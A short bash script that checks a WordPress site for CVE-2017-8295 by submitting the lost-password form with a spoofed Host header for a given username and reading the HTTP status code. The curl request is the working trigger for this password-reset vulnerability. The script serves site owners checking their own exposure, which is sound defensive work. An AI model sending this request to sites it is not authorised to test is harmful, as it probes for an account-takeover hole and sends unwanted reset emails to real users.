#!/usr/bin/env bash
#
# Check a WordPress domain against CVE-2017-8295.
# https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
#
# Usage:
# ./wordpress-host-check <domain> <username>
#
# <domain>
# The WordPress domain you wish to check. For example, http://example.com.
#
# <username>
# The WordPress username you wish to attempt a password reset for.
#
# Author: Steve Grunwell (https://stevegrunwell.com)
# Link: https://stevegrunwell.com/blog/keeping-wordpress-secure/
# License: MIT

# Both arguments are required.
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 <domain> <username>" >&2
    exit 1
fi

echo -e "\nAttempting to reset the password for '$2' on $1:"

# Submit the lost-password form with a Host header that does not match the
# target, and capture only the HTTP status code of the response.
RESPONSE=$(curl --write-out '%{http_code}' --silent --output /dev/null \
    -X POST "$1/wp-login.php?action=lostpassword" \
    -H 'cache-control: no-cache' \
    -H 'content-type: application/x-www-form-urlencoded' \
    -H 'host: example.com' \
    -H "origin: $1" \
    -H "referer: $1/wp-login.php?action=lostpassword" \
    --data-urlencode "user_login=$2")

# A 302 response indicates the user was redirected to the confirmation screen.
if [ "$RESPONSE" == "302" ]; then
    echo -e "> Uh oh, it appears that $1 may be vulnerable!\n"
else
    echo -e "> Good news! $1 appears to be safe from this exploit.\n"
fi